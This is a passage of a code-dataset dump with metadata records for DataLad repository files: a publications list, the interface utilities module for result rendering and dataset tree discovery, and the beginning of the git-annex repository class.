Passed to `init_datalad_remote`.\n \"\"\"\n from datalad.consts import (\n DATALAD_SPECIAL_REMOTE,\n DATALAD_SPECIAL_REMOTES_UUIDS,\n )\n\n remote = remote or DATALAD_SPECIAL_REMOTE\n\n uuid = DATALAD_SPECIAL_REMOTES_UUIDS.get(remote)\n if not uuid:\n raise ValueError(\"'{}' is not a known datalad special remote: {}\"\n .format(remote,\n \", \".join(DATALAD_SPECIAL_REMOTES_UUIDS)))\n name = repo.get_special_remotes().get(uuid, {}).get(\"name\")\n\n if not name:\n init_datalad_remote(repo, remote,\n encryption=encryption, autoenable=autoenable)\n elif repo.is_special_annex_remote(name, check_if_known=False):\n lgr.debug(\"datalad special remote '%s' is already enabled\", name)\n else:\n lgr.info(\"datalad special remote '%s' found. Enabling\", name)\n repo.enable_remote(name)\n" }, { "alpha_fraction": 0.6940639019012451, "alphanum_fraction": 0.7221134901046753, "avg_line_length": 51.86206817626953, "blob_id": "45ad77f9307138f245f4f477778bea350a28188c", "content_id": "8fa685f0ff68212004466bdc040efb5135e03508", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1533, "license_type": "permissive", "max_line_length": 116, "num_lines": 29, "path": "/docs/source/publications.rst", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "Publications\n************\n\nFurther conceptual and technical information on DataLad, and applications built on DataLad,\nare available from the publications listed below.\n\nThe best of both worlds: Using semantic web with JSOB-LD. An example with NIDM Results & DataLad [poster]\n - Camille Maumet, Satrajit Ghosh, Yaroslav O. Halchenko, Dorota Jarecka, Nolan Nichols, Jean-Baptist POline, Michael Hanke\n\nOne thing to bind them all: A complete raw data structure for auto-generation of BIDS datasets [poster]\n - Benjamin Poldrack, Kyle Meyer, Yaroslav O. Halchenko, Michael Hanke\n\nFantastic containers and how to tame them [poster]\n - Yaroslav O. Halchenko, Kyle Meyer, Matt Travers, Dorota Jarecka, Satrajit Ghosh, Jakub Kaczmarzyk, Michael Hanke\n\nYODA: YODA's Organigram on Data Analysis [poster]\n - An outline of a simple approach to structuring and conducting data analyses that aims to\n tightly connect all their essential ingredients: data, code, and computational environments\n in a transparent, modular, accountable, and practical way.\n - Michael Hanke, Kyle A. Meyer, Matteo Visconti di Oleggio Castello, Benjamin Poldrack, Yaroslav O. Halchenko\n - F1000Research 2018, 7:1965 (https://doi.org/10.7490/f1000research.1116363.1)\n\nGo FAIR with DataLad [talk]\n - On DataLad's capabilities to create and maintain Findable, Accessible, Interoperable, and Re-Usable (FAIR)\n resources.\n - Michael Hanke, Yaroslav O. Halchenko\n - Bernstein Conference 2018 workshop: Practical approaches to research data management and reproducibility\n (`slides <https://rawgit.com/psychoinformatics-de/talk-datalad-gofair/master/index.html>`__)\n - OpenNeuro kick-off meeting, 2018, Stanford (`slide sources <https://github.com/datalad/talk-openneuro-2018>`__)\n" }, { "alpha_fraction": 0.5877985954284668, "alphanum_fraction": 0.5893614888191223, "avg_line_length": 37.2004280090332, "blob_id": "07f8fabb385abc1f4062679e35001dbd3650b15f", "content_id": "236e9fddaff2b8d50d2d6dcbade190c8c5b0dec4", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 17916, "license_type": "permissive", "max_line_length": 112, "num_lines": 469, "path": "/datalad/interface/utils.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Interface utility functions\n\n\"\"\"\n\n__docformat__ = 'restructuredtext'\n\nimport logging\nimport sys\nfrom time import time\nfrom os import listdir\nfrom os.path import join as opj\nfrom os.path import isdir\nfrom os.path import relpath\nfrom os.path import sep\n\nimport json\n\nfrom typing import (\n TypeVar\n)\n# avoid import from API to not get into circular imports\nfrom datalad.utils import with_pathsep as _with_sep # TODO: RF whenever merge conflict is not upon us\nfrom datalad.utils import (\n path_startswith,\n path_is_subpath,\n ensure_unicode,\n getargspec,\n)\nfrom datalad.support.gitrepo import GitRepo\nfrom datalad.support.exceptions import (\n CapturedException,\n)\nfrom datalad import cfg as dlcfg\nfrom datalad.dochelpers import single_or_plural\nfrom datalad.ui import ui\nimport datalad.support.ansi_colors as ac\n\nanInterface = TypeVar('anInterface', bound='Interface')\n\nlgr = logging.getLogger('datalad.interface.utils')\n\n\n# TODO remove\n# only `drop` and `uninstall` are still using this\ndef handle_dirty_dataset(ds, mode, msg=None):\n \"\"\"Detect and treat unsaved changes as instructed by `mode`\n\n Parameters\n ----------\n ds : Dataset or None\n Dataset to be inspected. Does nothing if `None`.\n mode : {'fail', 'ignore', 'save-before'}\n How to act upon discovering unsaved changes.\n msg : str or None\n Custom message to use for a potential commit.\n\n Returns\n -------\n None\n \"\"\"\n if ds is None:\n # nothing to be handled\n return\n if msg is None:\n msg = '[DATALAD] auto-saved changes'\n\n # make sure that all pending changes (batched annex operations, etc.)\n # are actually reflected in Git\n if ds.repo:\n ds.repo.precommit()\n\n if mode == 'ignore':\n return\n elif mode == 'fail':\n if not ds.repo or ds.repo.dirty:\n raise RuntimeError('dataset {} has unsaved changes'.format(ds))\n elif mode == 'save-before':\n if not ds.is_installed():\n raise RuntimeError('dataset {} is not yet installed'.format(ds))\n from datalad.core.local.save import Save\n Save.__call__(dataset=ds, message=msg, updated=True)\n else:\n raise ValueError(\"unknown if-dirty mode '{}'\".format(mode))\n\n\ndef get_tree_roots(paths):\n \"\"\"Return common root paths for a set of paths\n\n This function determines the smallest set of common root\n paths and sorts all given paths under the respective\n root.\n\n Returns\n -------\n dict\n paths by root\n \"\"\"\n paths_ws = [_with_sep(p) for p in paths]\n # sort all paths under their potential roots\n roots = {}\n # start from the top to get all paths down the line\n # and collate them into as few roots as possible\n for s in sorted(paths_ws):\n if any([s.startswith(r) for r in roots]):\n # this path is already covered by a known root\n continue\n # find all sub paths\n subs = [p for p in paths if p.startswith(s)]\n roots[s.rstrip(sep)] = subs\n return roots\n\n\n# TODO(OPT)? YOH: from a cursory review seems like possibly an expensive function\n# whenever many paths were provided (e.g. via shell glob).\n# Might be worth testing on some usecase and py-spy'ing if notable portion\n# of time is spent.\ndef discover_dataset_trace_to_targets(basepath, targetpaths, current_trace,\n spec, includeds=None):\n \"\"\"Discover the edges and nodes in a dataset tree to given target paths\n\n Parameters\n ----------\n basepath : path\n Path to a start or top-level dataset. Really has to be a path to a\n dataset!\n targetpaths : list(path)\n Any non-zero number of paths that are termination points for the\n search algorithm. Can be paths to datasets, directories, or files\n (and any combination thereof).\n current_trace : list\n For a top-level call this should probably always be `[]`\n spec : dict\n `content_by_ds`-style dictionary that will receive information about the\n discovered datasets. Specifically, for each discovered dataset there\n will be an item with its path under the key (path) of the respective\n superdataset.\n includeds : sequence, optional\n Any paths given are treated as existing subdatasets, regardless of\n whether they can be found in the filesystem. Such subdatasets will appear\n under the key of the closest existing dataset in the `spec`.\n\n Returns\n -------\n None\n Function calls itself recursively and populates `spec` dict in-place.\n Keys are dataset paths, values are sets of subdataset paths\n \"\"\"\n # convert to set for faster lookup\n includeds = includeds if isinstance(includeds, set) else \\\n set() if includeds is None else set(includeds)\n # this beast walks the directory tree from a given `basepath` until\n # it discovers any of the given `targetpaths`\n # if it finds one, it commits any accummulated trace of visited\n # datasets on this edge to the spec\n valid_repo = GitRepo.is_valid_repo(basepath)\n if valid_repo:\n # we are passing into a new dataset, extend the dataset trace\n current_trace = current_trace + [basepath]\n # this edge is not done, we need to try to reach any downstream\n # dataset\n undiscovered_ds = set(t for t in targetpaths) # if t != basepath)\n # whether anything in this directory matched a targetpath\n filematch = False\n if isdir(basepath):\n for p in listdir(basepath):\n p = ensure_unicode(opj(basepath, p))\n if not isdir(p):\n if p in targetpaths:\n filematch = True\n # we cannot have anything below this one\n continue\n # OPT listdir might be large and we could have only few items\n # in `targetpaths` -- so traverse only those in spec which have\n # leading dir basepath\n # filter targets matching this downward path\n downward_targets = set(\n t for t in targetpaths if path_startswith(t, p))\n if not downward_targets:\n continue\n # remove the matching ones from the \"todo\" list\n undiscovered_ds.difference_update(downward_targets)\n # go one deeper\n discover_dataset_trace_to_targets(\n p, downward_targets, current_trace, spec,\n includeds=includeds if not includeds else includeds.intersection(\n downward_targets))\n undiscovered_ds = [t for t in undiscovered_ds\n if includeds and\n path_is_subpath(t, current_trace[-1]) and\n t in includeds]\n if filematch or basepath in targetpaths or undiscovered_ds:\n for i, p in enumerate(current_trace[:-1]):\n # TODO RF prepare proper annotated path dicts\n subds = spec.get(p, set())\n subds.add(current_trace[i + 1])\n spec[p] = subds\n if undiscovered_ds:\n spec[current_trace[-1]] = spec.get(current_trace[-1], set()).union(\n undiscovered_ds)\n\n\ndef get_result_filter(fx):\n \"\"\"Wrap a filter into a helper to be able to accept additional\n arguments, if the filter doesn't support it already\"\"\"\n _fx = fx\n if fx and not getargspec(fx).keywords:\n def _fx(res, **kwargs):\n return fx(res)\n return _fx\n\n\ndef eval_results(wrapped):\n import warnings\n from datalad.interface.base import eval_results as eval_results_moved\n warnings.warn(\"datalad.interface.utils.eval_results is obsolete. \"\n \"Use datalad.interface.base.eval_results instead\",\n DeprecationWarning)\n return eval_results_moved(wrapped)\n\n\ndef generic_result_renderer(res):\n if res.get('status', None) != 'notneeded':\n path = res.get('path', None)\n if path and res.get('refds'):\n try:\n path = relpath(path, res['refds'])\n except ValueError:\n # can happen, e.g., on windows with paths from different\n # drives. just go with the original path in this case\n pass\n ui.message('{action}({status}):{path}{type}{msg}{err}'.format(\n action=ac.color_word(\n res.get('action', '<action-unspecified>'),\n ac.BOLD),\n status=ac.color_status(res.get('status', '<status-unspecified>')),\n path=' {}'.format(path) if path else '',\n type=' ({})'.format(\n ac.color_word(res['type'], ac.MAGENTA)\n ) if 'type' in res else '',\n msg=' [{}]'.format(\n res['message'][0] % res['message'][1:]\n if isinstance(res['message'], tuple) else res[\n 'message'])\n if res.get('message', None) else '',\n err=ac.color_word(' [{}]'.format(\n res['error_message'][0] % res['error_message'][1:]\n if isinstance(res['error_message'], tuple) else res[\n 'error_message']), ac.RED)\n if res.get('error_message', None) and res.get('status', None) != 'ok' else ''))\n\n\n# keep for legacy compatibility\ndefault_result_renderer = generic_result_renderer\n\n\ndef render_action_summary(action_summary):\n ui.message(\"action summary:\\n {}\".format(\n '\\n '.join('{} ({})'.format(\n act,\n ', '.join('{}: {}'.format(status, action_summary[act][status])\n for status in sorted(action_summary[act])))\n for act in sorted(action_summary))))\n\n\ndef _display_suppressed_message(nsimilar, ndisplayed, last_ts, final=False):\n # +1 because there was the original result + nsimilar displayed.\n n_suppressed = nsimilar - ndisplayed + 1\n if n_suppressed > 0:\n ts = time()\n # rate-limit update of suppression message, with a large number\n # of fast-paced results updating for each one can result in more\n # CPU load than the actual processing\n # arbitrarily go for a 2Hz update frequency -- it \"feels\" good\n if last_ts is None or final or (ts - last_ts > 0.5):\n ui.message(' [{} similar {} been suppressed; disable with datalad.ui.suppress-similar-results=off]'\n .format(n_suppressed,\n single_or_plural(\"message has\",\n \"messages have\",\n n_suppressed, False)),\n cr=\"\\n\" if final else \"\\r\")\n return ts\n return last_ts\n\n\ndef _process_results(\n results,\n cmd_class,\n on_failure,\n action_summary,\n incomplete_results,\n result_renderer,\n result_log_level,\n allkwargs):\n # private helper pf @eval_results\n # loop over results generated from some source and handle each\n # of them according to the requested behavior (logging, rendering, ...)\n\n # used to track repeated messages in the generic renderer\n last_result = None\n # the timestamp of the last renderer result\n last_result_ts = None\n # counter for detected repetitions\n last_result_reps = 0\n # how many repetitions to show, before suppression kicks in\n render_n_repetitions = \\\n dlcfg.obtain('datalad.ui.suppress-similar-results-threshold') \\\n if sys.stdout.isatty() \\\n and dlcfg.obtain('datalad.ui.suppress-similar-results') \\\n else float(\"inf\")\n\n for res in results:\n if not res or 'action' not in res:\n # XXX Yarik has to no clue on how to track the origin of the\n # record to figure out WTF, so he just skips it\n # but MIH thinks leaving a trace of that would be good\n lgr.debug('Drop result record without \"action\": %s', res)\n continue\n\n actsum = action_summary.get(res['action'], {})\n if res['status']:\n actsum[res['status']] = actsum.get(res['status'], 0) + 1\n action_summary[res['action']] = actsum\n ## log message, if there is one and a logger was given\n msg = res.get('message', None)\n # remove logger instance from results, as it is no longer useful\n # after logging was done, it isn't serializable, and generally\n # pollutes the output\n res_lgr = res.pop('logger', None)\n if msg and res_lgr:\n if isinstance(res_lgr, logging.Logger):\n # didn't get a particular log function, go with default\n res_lgr = getattr(\n res_lgr,\n default_logchannels[res['status']]\n if result_log_level == 'match-status'\n else result_log_level)\n msg = res['message']\n msgargs = None\n if isinstance(msg, tuple):\n msgargs = msg[1:]\n msg = msg[0]\n if 'path' in res:\n # result path could be a path instance\n path = str(res['path'])\n if msgargs:\n # we will pass the msg for %-polation, so % should be doubled\n path = path.replace('%', '%%')\n msg = '{} [{}({})]'.format(\n msg, res['action'], path)\n if msgargs:\n # support string expansion of logging to avoid runtime cost\n try:\n res_lgr(msg, *msgargs)\n except TypeError as exc:\n raise TypeError(\n \"Failed to render %r with %r from %r: %s\"\n % (msg, msgargs, res, str(exc))\n ) from exc\n else:\n res_lgr(msg)\n\n ## output rendering\n if result_renderer is None or result_renderer == 'disabled':\n pass\n elif result_renderer == 'generic':\n last_result_reps, last_result, last_result_ts = \\\n _render_result_generic(\n res, render_n_repetitions,\n last_result_reps, last_result, last_result_ts)\n elif result_renderer in ('json', 'json_pp'):\n _render_result_json(res, result_renderer.endswith('_pp'))\n elif result_renderer == 'tailored':\n cmd_class.custom_result_renderer(res, **allkwargs)\n elif hasattr(result_renderer, '__call__'):\n _render_result_customcall(res, result_renderer, allkwargs)\n else:\n raise ValueError(f'unknown result renderer \"{result_renderer}\"')\n\n ## error handling\n # looks for error status, and report at the end via\n # an exception\n if on_failure in ('continue', 'stop') \\\n and res['status'] in ('impossible', 'error'):\n incomplete_results.append(res)\n if on_failure == 'stop':\n # first fail -> that's it\n # raise will happen after the loop\n break\n yield res\n # make sure to report on any issues that we had suppressed\n _display_suppressed_message(\n last_result_reps, render_n_repetitions, last_result_ts, final=True)\n\n\ndef _render_result_generic(\n res, render_n_repetitions,\n # status vars\n last_result_reps, last_result, last_result_ts):\n # which result dict keys to inspect for changes to discover repetitions\n # of similar messages\n repetition_keys = set(('action', 'status', 'type', 'refds'))\n\n trimmed_result = {k: v for k, v in res.items() if k in repetition_keys}\n if res.get('status', None) != 'notneeded' \\\n and trimmed_result == last_result:\n # this is a similar report, suppress if too many, but count it\n last_result_reps += 1\n if last_result_reps < render_n_repetitions:\n generic_result_renderer(res)\n else:\n last_result_ts = _display_suppressed_message(\n last_result_reps, render_n_repetitions, last_result_ts)\n else:\n # this one is new, first report on any prev. suppressed results\n # by number, and then render this fresh one\n last_result_ts = _display_suppressed_message(\n last_result_reps, render_n_repetitions, last_result_ts,\n final=True)\n generic_result_renderer(res)\n last_result_reps = 0\n return last_result_reps, trimmed_result, last_result_ts\n\n\ndef _render_result_json(res, prettyprint):\n ui.message(json.dumps(\n {k: v for k, v in res.items()\n if k not in ('logger')},\n sort_keys=True,\n indent=2 if prettyprint else None,\n default=str))\n\n\ndef _render_result_customcall(res, result_renderer, allkwargs):\n try:\n result_renderer(res, **allkwargs)\n except Exception as e:\n lgr.warning('Result rendering failed for: %s [%s]',\n res, CapturedException(e))\n\n\ndef keep_result(res, rfilter, **kwargs):\n if not rfilter:\n return True\n try:\n if not rfilter(res, **kwargs):\n # give the slightest indication which filter was employed\n raise ValueError(\n 'excluded by filter {} with arguments {}'.format(rfilter, kwargs))\n except ValueError as e:\n # make sure to report the excluded result to massively improve\n # debugging experience\n lgr.debug('Not reporting result (%s): %s', CapturedException(e), res)\n return False\n return True\n\n\ndef xfm_result(res, xfm):\n if not xfm:\n return res\n\n return xfm(res)\n" }, { "alpha_fraction": 0.5485745668411255, "alphanum_fraction": 0.5524276494979858, "avg_line_length": 38.03797149658203, "blob_id": "534053043536d406a271dafb421ba6832083456d", "content_id": "d6f28026ca00583e4deae12008a9e14eb02fb3d0", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 159353, "license_type": "permissive", "max_line_length": 167, "num_lines": 4082, "path": "/datalad/support/annexrepo.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Interface to git-annex by Joey Hess.\n\nFor further information on git-annex see https://git-annex.branchable.com/.\n\n\"\"\"\n\nimport json\nimport logging\nimport os\nimport re\nimport warnings\nfrom itertools import chain\nfrom multiprocessing import cpu_count\nfrom os import linesep\nfrom os.path import (\n curdir,\n exists,\n isdir,\n)\nfrom os.path import join as opj\nfrom os.path import (\n lexists,\n normpath,\n)\nfrom typing import Dict\nfrom weakref import (\n WeakValueDictionary,\n finalize,\n)\n\nimport datalad.utils as ut\nfrom datalad.cmd import ( # KillOutput,\n BatchedCommand,\n GitWitlessRunner,\n SafeDelCloseMixin,\n StdOutCapture,\n StdOutErrCapture,\n WitlessProtocol,\n)\nfrom datalad.consts import WEB_SPECIAL_REMOTE_UUID\n# imports from same module:\nfrom datalad.dataset.repo import RepoInterface\nfrom datalad.dochelpers import (\n borrowdoc,\n borrowkwargs,\n)\nfrom datalad.log import log_progress\nfrom datalad.runner.protocol import GeneratorMixIn\nfrom datalad.runner.utils import (\n AssemblingDecoderMixIn,\n LineSplitter,\n)\n\nfrom datalad.support.annex_utils import (\n _fake_json_for_non_existing,\n _get_non_existing_from_annex_output,\n _sanitize_key,\n)\nfrom datalad.support.exceptions import CapturedException\nfrom datalad.ui import ui\nfrom datalad.utils import (\n Path,\n PurePosixPath,\n auto_repr,\n ensure_list,\n on_windows,\n split_cmdline,\n unlink,\n)\n\nfrom .exceptions import (\n AccessDeniedError,\n AccessFailedError,\n AnnexBatchCommandError,\n CommandError,\n CommandNotAvailableError,\n DirectModeNoLongerSupportedError,\n FileInGitError,\n FileNotInAnnexError,\n IncompleteResultsError,\n InsufficientArgumentsError,\n InvalidAnnexRepositoryError,\n InvalidGitRepositoryError,\n MissingExternalDependency,\n NoSuchPathError,\n OutdatedExternalDependency,\n OutOfSpaceError,\n RemoteNotAvailableError,\n)\nfrom .external_versions import external_versions\nfrom .gitrepo import (\n GitRepo,\n normalize_path,\n normalize_paths,\n to_options,\n)\n\nlgr = logging.getLogger('datalad.annex')\n\n\nclass AnnexRepo(GitRepo, RepoInterface):\n \"\"\"Representation of an git-annex repository.\n\n Paths given to any of the class methods will be interpreted as relative\n to PWD, in case this is currently beneath AnnexRepo's base dir\n (`self.path`). If PWD is outside of the repository, relative paths\n will be interpreted as relative to `self.path`. Absolute paths will be\n accepted either way.\n \"\"\"\n\n # Begin Flyweight:\n _unique_instances = WeakValueDictionary()\n\n def _flyweight_invalid(self):\n return not self.is_valid_annex(allow_noninitialized=True)\n\n # End Flyweight:\n\n # Web remote UUID, kept here for backward compatibility\n WEB_UUID = WEB_SPECIAL_REMOTE_UUID\n\n # To be assigned and checked to be good enough upon first call to AnnexRepo\n # 6.20160923 -- --json-progress for get\n # 6.20161210 -- annex add to add also changes (not only new files) to git\n # 6.20170220 -- annex status provides --ignore-submodules\n # 6.20180416 -- annex handles unicode filenames more uniformly\n # 6.20180913 -- annex fixes all known to us issues for v6\n # 7 -- annex makes v7 mode default on crippled systems. We demand it for consistent operation\n # 7.20190503 -- annex introduced mimeencoding support needed for our text2git\n #\n # When bumping this, check whether datalad.repo.version needs to be\n # adjusted.\n GIT_ANNEX_MIN_VERSION = '8.20200309'\n git_annex_version = None\n supports_direct_mode = None\n repository_versions = None\n _version_kludges = {}\n\n def __init__(self, path, runner=None,\n backend=None, always_commit=True,\n create=True, create_sanity_checks=True,\n init=False, batch_size=None, version=None, description=None,\n git_opts=None, annex_opts=None, annex_init_opts=None,\n repo=None, fake_dates=False):\n \"\"\"Creates representation of git-annex repository at `path`.\n\n AnnexRepo is initialized by giving a path to the annex.\n If no annex exists at that location, a new one is created.\n Optionally give url to clone from.\n\n Parameters\n ----------\n path: str\n Path to git-annex repository. In case it's not an absolute path, it's\n relative to PWD\n runner: Runner, optional\n Provide a Runner in case AnnexRepo shall not create it's own.\n This is especially needed in case of desired dry runs.\n backend: str, optional\n Set default backend used by this annex. This does NOT affect files,\n that are already annexed nor will it automatically migrate files,\n hat are 'getted' afterwards.\n create: bool, optional\n Create and initialize an annex repository at path, in case\n there is none. If set to False, and this repository is not an annex\n repository (initialized or not), an exception is raised.\n create_sanity_checks: bool, optional\n Passed to GitRepo.\n init: bool, optional\n Initialize git-annex repository (run \"git annex init\") if path is an\n annex repository which just was not yet initialized by annex (e.g. a\n fresh git clone). Note that if `create=True`, then initialization\n would happen\n batch_size: int, optional\n If specified and >0, instructs annex to batch this many commands before\n annex adds acts on git repository (e.g. adds them them to index for addurl).\n version: int, optional\n If given, pass as --version to `git annex init`\n description: str, optional\n Short description that humans can use to identify the\n repository/location, e.g. \"Precious data on my laptop\"\n \"\"\"\n\n # BEGIN Repo validity test\n # We want to fail early for tests, that would be performed a lot. In particular this is about\n # AnnexRepo.is_valid_repo. We would use the latter to decide whether or not to call AnnexRepo() only for\n # __init__ to then test the same things again. If we fail early we can save the additional test from outer\n # scope.\n do_init = False\n super(AnnexRepo, self).__init__(\n path, runner=runner,\n create=create, create_sanity_checks=create_sanity_checks,\n repo=repo, git_opts=git_opts, fake_dates=fake_dates)\n\n # Check whether an annex already exists at destination\n # XXX this doesn't work for a submodule!\n\n # NOTE: We are in __init__ here and already know that GitRepo.is_valid_git is True, since super.__init__ was\n # called. Therefore: check_git=False\n if not self.is_valid_annex(check_git=False):\n # so either it is not annex at all or just was not yet initialized\n # TODO: There's still potential to get a bit more performant. is_with_annex() is checking again, what\n # is_valid_annex did. However, this marginal here, considering the call to git-annex-init.\n if self.is_with_annex():\n # it is an annex repository which was not initialized yet\n if create or init:\n lgr.debug('Annex repository was not yet initialized at %s.'\n ' Initializing ...' % self.path)\n do_init = True\n elif create:\n lgr.debug('Initializing annex repository at %s...', self.path)\n do_init = True\n else:\n raise InvalidAnnexRepositoryError(\"No annex found at %s.\" % self.path)\n\n # END Repo validity test\n\n # initialize\n self._uuid = None\n self._annex_common_options = [\"-c\", \"annex.dotfiles=true\"]\n\n if annex_opts or annex_init_opts:\n lgr.warning(\"TODO: options passed to git-annex and/or \"\n \"git-annex-init are currently ignored.\\n\"\n \"options received:\\n\"\n \"git-annex: %s\\ngit-annex-init: %s\" %\n (annex_opts, annex_init_opts))\n\n # Below was initially introduced for setting for direct mode workaround,\n # where we changed _GIT_COMMON_OPTIONS and had to avoid passing\n # --worktree=. -c core.bare=False to git annex commands, so for their\n # invocation we kept and used pristine version of the\n # common options. yoh thought it would be good to keep this as a copy\n # just in case we do need to pass annex specific options, even if\n # there is no need ATM\n self._ANNEX_GIT_COMMON_OPTIONS = self._GIT_COMMON_OPTIONS[:]\n self.always_commit = always_commit\n\n config = self.config\n if version is None:\n version = config.get(\"datalad.repo.version\", None)\n # we might get an empty string here\n # TODO: if we use obtain() instead, we get an error complaining\n # '' cannot be converted to int (via Constraint as defined for\n # \"datalad.repo.version\" in common_cfg\n # => Allow conversion to result in None?\n if version:\n try:\n version = int(version)\n except ValueError:\n # Just give a warning if things look off and let\n # git-annex-init complain if it can't actually handle it.\n lgr.warning(\n \"Expected an int for datalad.repo.version, got %s\",\n version)\n else:\n # The above comment refers to an empty string case. The commit\n # (f12eb03f40) seems to deal with direct mode, so perhaps this\n # isn't reachable anymore.\n version = None\n\n if do_init:\n self._init(version=version, description=description)\n\n # TODO: RM DIRECT eventually, but should remain while we have is_direct_mode\n self._direct_mode = None\n\n # Handle cases of detecting repositories with no longer supported\n # direct mode.\n # Could happen in case we didn't specify anything, but annex forced\n # direct mode due to FS or an already existing repo was in direct mode,\n if self._is_direct_mode_from_config():\n raise DirectModeNoLongerSupportedError(\n self,\n \"Git configuration reports repository being in direct mode\"\n )\n\n if config.getbool(\"datalad\", \"repo.direct\", default=False):\n raise DirectModeNoLongerSupportedError(\n self,\n \"datalad.repo.direct configuration instructs to use direct mode\"\n )\n\n self._batched = BatchedAnnexes(\n batch_size=batch_size, git_options=self._ANNEX_GIT_COMMON_OPTIONS)\n\n # set default backend for future annex commands:\n # TODO: Should the backend option of __init__() also migrate\n # the annex, in case there are annexed files already?\n if backend:\n self.set_default_backend(backend, persistent=True)\n\n # will be evaluated lazily\n self._n_auto_jobs = None\n\n # Finally, register a finalizer (instead of having a __del__ method).\n # This will be called by garbage collection as well as \"atexit\". By\n # keeping the reference here, we can also call it explicitly.\n # Note, that we can pass required attributes to the finalizer, but not\n # `self` itself. This would create an additional reference to the object\n # and thereby preventing it from being collected at all.\n self._finalizer = finalize(self, AnnexRepo._cleanup, self.path,\n self._batched)\n\n def set_default_backend(self, backend, persistent=True, commit=True):\n \"\"\"Set default backend\n\n Parameters\n ----------\n backend : str\n persistent : bool, optional\n If persistent, would add/commit to .gitattributes. If not -- would\n set within .git/config\n \"\"\"\n if persistent:\n # could be set in .gitattributes or $GIT_DIR/info/attributes\n if 'annex.backend' in self.get_gitattributes('.')['.']:\n lgr.debug(\n \"Not (re)setting backend since seems already set in git attributes\"\n )\n else:\n lgr.debug(\"Setting annex backend to %s (persistently)\", backend)\n git_attributes_file = '.gitattributes'\n self.set_gitattributes(\n [('*', {'annex.backend': backend})],\n git_attributes_file)\n self.add(git_attributes_file, git=True)\n if commit:\n self.commit(\n \"Set default backend for all files to be %s\" % backend,\n _datalad_msg=True,\n files=[git_attributes_file]\n )\n else:\n lgr.debug(\"Setting annex backend to %s (in .git/config)\", backend)\n self.config.set('annex.backend', backend, scope='local')\n\n @classmethod\n def _cleanup(cls, path, batched):\n\n lgr.log(1, \"Finalizer called on: AnnexRepo(%s)\", path)\n\n # Ben: With switching to finalize rather than del, I think the\n # safe_del_debug isn't needed anymore. However, time will tell and\n # it doesn't hurt.\n\n def safe__del__debug(e):\n \"\"\"We might be too late in the game and either .debug or exc_str\n are no longer bound\"\"\"\n try:\n return lgr.debug(str(e))\n except (AttributeError, NameError):\n return\n\n try:\n if batched is not None:\n batched.close()\n except TypeError as e:\n # Workaround:\n # most likely something wasn't accessible anymore; doesn't really\n # matter since we wanted to delete it anyway.\n #\n # Nevertheless, in some cases might be an issue and it is a strange\n # thing to happen, since we check for things being None herein as\n # well as in super class __del__;\n # At least log it:\n safe__del__debug(e)\n\n def is_managed_branch(self, branch=None):\n \"\"\"Whether `branch` is managed by git-annex.\n\n ATM this returns True if on an adjusted branch of annex v6+ repository:\n either 'adjusted/my_branch(unlocked)' or 'adjusted/my_branch(fixed)'\n\n Note: The term 'managed branch' is used to make clear it's meant to be\n more general than the v6+ 'adjusted branch'.\n\n Parameters\n ----------\n branch: str\n name of the branch; default: active branch\n\n Returns\n -------\n bool\n True if on a managed branch, False otherwise\n \"\"\"\n\n if branch is None:\n branch = self.get_active_branch()\n # Note: `branch` might still be None, due to detached HEAD\n # (or no checkout at all)\n return (branch and branch.startswith('adjusted/'))\n\n def get_corresponding_branch(self, branch=None):\n \"\"\"Get the name of a potential corresponding branch.\n\n Parameters\n ----------\n branch: str, optional\n Name of the branch to report a corresponding branch for;\n defaults to active branch\n\n Returns\n -------\n str or None\n Name of the corresponding branch, or `None` if there is no\n corresponding branch.\n \"\"\"\n\n if branch is None:\n branch = self.get_active_branch()\n\n if self.is_managed_branch(branch):\n if branch.startswith('adjusted/'):\n if branch.endswith('(unlocked)'):\n cor_branch = branch[9:-10]\n elif branch.endswith('(fixed)'):\n cor_branch = branch[9:-7]\n else:\n cor_branch = branch[9:]\n lgr.warning(\"Unexpected naming of adjusted branch '%s'.%s\"\n \"Assuming '%s' to be the corresponding branch.\",\n branch, linesep, cor_branch)\n else:\n raise NotImplementedError(\n \"Detection of annex-managed branch '{}' follows a pattern \"\n \"not implemented herein.\".format(branch))\n return cor_branch\n\n else:\n return None\n\n def get_tracking_branch(self, branch=None, remote_only=False,\n corresponding=True):\n \"\"\"Get the tracking branch for `branch` if there is any.\n\n By default returns the tracking branch of the corresponding branch if\n `branch` is a managed branch.\n\n Parameters\n ----------\n branch: str\n local branch to look up. If none is given, active branch is used.\n remote_only : bool\n Don't return a value if the upstream remote is set to \".\" (meaning\n this repository).\n corresponding: bool\n If True actually look up the corresponding branch of `branch` (also if\n `branch` isn't explicitly given)\n\n Returns\n -------\n tuple\n (remote or None, refspec or None) of the tracking branch\n \"\"\"\n\n if branch is None:\n branch = self.get_active_branch()\n\n return super(AnnexRepo, self).get_tracking_branch(\n remote_only=remote_only,\n branch=(self.get_corresponding_branch(branch) or branch)\n if corresponding else branch)\n\n @classmethod\n def _check_git_annex_version(cls):\n ver = external_versions['cmd:annex']\n # in case it is missing\n msg = \"Visit http://handbook.datalad.org/r.html?install \" \\\n \"for instructions on how to install DataLad and git-annex.\"\n\n exc_kwargs = dict(\n name=\"git-annex\",\n msg=msg,\n ver=cls.GIT_ANNEX_MIN_VERSION\n )\n if not ver:\n raise 